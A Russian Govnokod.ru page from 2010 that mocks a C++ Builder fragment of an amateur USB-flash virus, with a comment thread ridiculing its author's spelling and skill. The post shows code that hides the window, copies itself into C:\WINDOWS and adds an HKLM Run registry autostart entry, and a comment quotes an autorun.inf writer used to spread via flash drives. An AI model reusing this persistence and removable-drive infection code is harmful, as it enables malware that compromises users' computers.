Говнокод #3327 — C++ — Говнокод.ру

C++ / Говнокод #3327

+168
1. 01
2. 02
3. 03
4. 04
5. 05
6. 06
7. 07
8. 08
9. 09
10. 10
11. 11
12. 12
13. 13
14. 14
15. 15
16. 16
```
void __fastcall TForm1::FormCreate(TObject *Sender)
{
Application->ShowMainForm=false; //прячимся

// Осваеваемся в новой системе
if(ParamStr(0)!="C:\\WINDOWS\\WebKill_USB_Flash_V.exe") {
//скопируемся
CopyFile(ParamStr(0).c_str(),"C:\\WINDOWS\\WebKill_USB_Flash_V.exe",true);
//и пропишимся в автозагрузку:
TRegistry *reg=new TRegistry;
reg->RootKey=HKEY_LOCAL_MACHINE;
reg->OpenKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run", false);
reg->WriteString("SystemX" , "C:\\WINDOWS\\WebKill_USB_Flash_V.exe");
reg->CloseKey();
reg->Free();
}
```
ПРЯЧИМСЯ (с) всеми извесный убиватель интернетов и "пейсатель" вирусов, которые грузятся с флэшки, бугога. Самый няшный кусочек :-) Хотя там ещё было убер заражение подключённых устройств. Судите сами господа http://3.webkill.ru/flash_virus.html

Запостил: This is obvious, 26 Мая 2010

Tweet
Комментарии (40) RSS
- TarasB 26.05.2010 20:35 # +5
  
  Ух тыыы, как круто. А зачем нужна главная форма, если всё равно она "прячится"?
  Ответить
  - This is obvious 26.05.2010 20:44 # 0
    
    а как тебе путь, куда копируемся ? и вообще "осваивание в новой системе" ?:D
    Ответить
    - TarasB 26.05.2010 20:55 # 0
      
      Хз, у меня вообще в автозагрузке нет нихера. А если появится, то сразу получит.
      Ответить
  - guest 27.05.2010 09:42 # −3
    
    Это windows-way. Тамошние приложения общаются через сообщения, которые привязаны к окну.
    Ответить
    - turdman 27.05.2010 10:41 # +1
      
      Это webkill-way. В windows принимать сообщения может и сам процесс
      Ответить
- xynta 26.05.2010 22:45 # 0
  
  ОЛОЛО! Это же вебкилл!
  Ответить
- guest 26.05.2010 23:29 # +7
  
  "PS.
  Написано в целях изучения подобных технологий, небудьте жестокими, любите жизнь =)
  Ответственность за безконтрольное распространение вируса основаного на моём коде ложиться на того кто это всё компелировал, и дал "другу посмотреть"
  Компеляторы компелировали компелировали да не выкомпелировали :)
  Ответить
- guest 26.05.2010 23:36 # +1
  
  Реквестирую УебКилла для наказания неверных!
  Ответить
- guest 27.05.2010 02:30 # +3
  
  гыы, особо радует хардкод "c:\\windows".
  
  Впрочем, уебкилл -- школота и скрипт-кидди, от него этим за версту пахнет. "Хакинг", мля).
  Ответить
  - This is obvious 27.05.2010 19:53 # 0
    
    что-то мне подсказывает что OVER 50% вирусов пишут таким хардкодом. Нужно сменить букву диска ;-D
    Ответить
    - guest 30.05.2010 01:14 # −2
      
      over 90,0% компов имеют винду в c:\windows, так что не так уж и говёно
      Ответить
- guest 27.05.2010 07:47 # +4
  
  Форма нужна потому что не знают как ее убрать.
  Ответить
- nil 27.05.2010 10:14 # +2
  
  Там третей коминтарей ниверно написон, далжно быть "скопируимся"!
  Ответить
- guest 27.05.2010 11:07 # +1
  
  WebKill забил на веб. Теперь переключился на ваш компьютер. Кто станет следующей жертвой?
  Ответить
- funny_rabbit 27.05.2010 12:33 # +11
  
  Там дальше доставляет кусочек:
  if(F)
  {
  fprintf(F, "[autorun]\n"); // создаём загрузочную запись
  fprintf(F, "open=1v.exe\n");
  fprintf(F, "shell=Открыть\n");
  
  fclose(F);
  }
  }
  /*
  else
  {
  ShowMessage(String("Cannot open file \"") + S + "\"");
  }
  
  фиерическое юзабилити - "вирус" выдает пользователю сообщения об ошибке, приятненько.
  Ответить
  - ISith 28.05.2010 23:07 # +1
    
    Хаха, хули, я помню ковырял троян, который из диболдовских банкоматов пины пиздил -- таг он был на делфи(а ебанэ стыт!) написан и тоже так об ошибках сообщал =). Таг он там и понапиздил реально всего дохера =)
    Ответить
    - This is obvious 28.05.2010 23:14 # +3
      
      зоибал пейсать на падонкоффском йазыке, сийчас токое нивмоде, все пилотки нетвойи
      Ответить
      
      ISith 29.05.2010 00:01 # 0
      
      идинахуй =)
      
      Ответить
      
      nil 29.05.2010 12:03 # 0
      
      Или все-таки пелотки? Я уж матчасть забыл:)
      Ответить
    - funny_rabbit 29.05.2010 21:09 # +1
      
      Интересно, как он в банкоматы эти попал o_O простите моюсерость, я не знаю, что такое диболдовские
      Ответить
      
      nil 29.05.2010 23:34 # 0
      
      diebold — фирма такая. Плюс к тому, человек и пароходпротокол.
      Ответить
      
      nil 29.05.2010 23:36 # 0
      
      Да, вирус на emv-карточках. Вставляешь ее в банкомат, ну, как флешку, ага. А она берет и заражает. Или заражается, как повезет!
      Ответить
      
      funny_rabbit 30.05.2010 05:54 # +3
      
      Ужасы какие...какртонки заряженные трояном на дельфи прячутся, осваиваются, прописываются и порабощают банкоматы - вебкилы ликуют, а анонимус плачет
      Ответить
      
      guest 30.05.2010 17:28 # −2
      
      Нех гнать на анона. Сейчас ты заплачешь.
      Ответить
      
      funny_rabbit 30.05.2010 18:13 # 0
      
      Хм..40 минут прошло - ни слезинки. Может подождать еще?
      Ответить
      
      guest 30.05.2010 19:19 # −2
      
      Погдь. Сейчас за луком сбегаю.
      Ответить
- guest 27.05.2010 15:22 # +5
  
  зато вебкила все интернеты знают) и никого из нас=)
  Ответить
  - guest 27.05.2010 15:24 # +8
    
    Нахуй такая слава.
    Ответить
    - guest 27.05.2010 16:54 # +5
      
      Его реально никто не знает. Если он придёт на работу - он же не будет говорить - я уёбкил. Так, что - для него это без последствий.
      Ответить
  - guest 28.05.2010 09:05 # +3
    
    Говори за себя. А я вот - анонимус, меня знают все интернеты.
    Ответить
  - xaionaro 02.06.2010 21:52 # 0
    
    Может дать ему ссылку на данный ресурс?)
    Ответить
- This is obvious 27.05.2010 20:49 # +4
  
  Выполнением заказов занимается команда фрилансеров с webkill.ru
  WebKill горантирует надёжность и качество выполняемых заказов.
  
  -----
  бля, он не один =\ Я Вам "горонтирую".
  Ответить
  - guest 27.05.2010 20:54 # 0
    
    гы, ебанат какой
    Ответить
- guest 29.05.2010 00:05 # +1
  
  прячимся > прячемся
  осваеваемся > осваиваемся
  пропишимся > пропишемся
  
  лол, парень нигде не угадал
  Ответить
  - This is obvious 29.05.2010 00:32 # 0
    
    Grammar Nazi is here! HIDING();
    Ответить
    - guest 29.05.2010 00:33 # −2
      
      луркоебанат детектед
      Ответить
      
      This is obvious 29.05.2010 11:53 # −1
      
      кажется луркоебанат с терминальной стадией ПГМ детектед.
      Ответить
    - guest 29.05.2010 00:36 # 0
      
      молю болезно, прости, что поругался.
      Ответить
  - nil 29.05.2010 12:04 # 0
    
    В одном месте он-таки угадал. (Или ошибся четное чсло раз).
    Ответить
- Jll-O6OBb 25.08.2021 21:12 # 0
  
  В течение всего "выступления" Катерины он смотрел в нашу сторону так, будто ненавидел её всей душой, а когда она меня обняла, так и вовсе мысленно четвертовал её.
  Ответить
Добавить комментарий
Ошибка компиляции комментария:

Гости могут высказаться только во вторник, пятницу или субботу
Семь раз отмерь — один отрежь, guest!

А не использовать ли нам bbcode?

[b]жирный[/b] — жирный

[i]курсив[/i] — курсив

[u]подчеркнутый[/u] — подчеркнутый

[s]перечеркнутый[/s] — перечеркнутый

[blink]мигающий[/blink] — мигающий

[color=red]цвет[/color] — цвет (подробнее)

[size=20]размер[/size] — размер (подробнее)

[code=<language>]some code[/code] (подробнее)

Проверочный код: *

Говнокод: по колено в коде.

C++ / Говнокод #3327

Комментарии (40) RSS

Добавить комментарий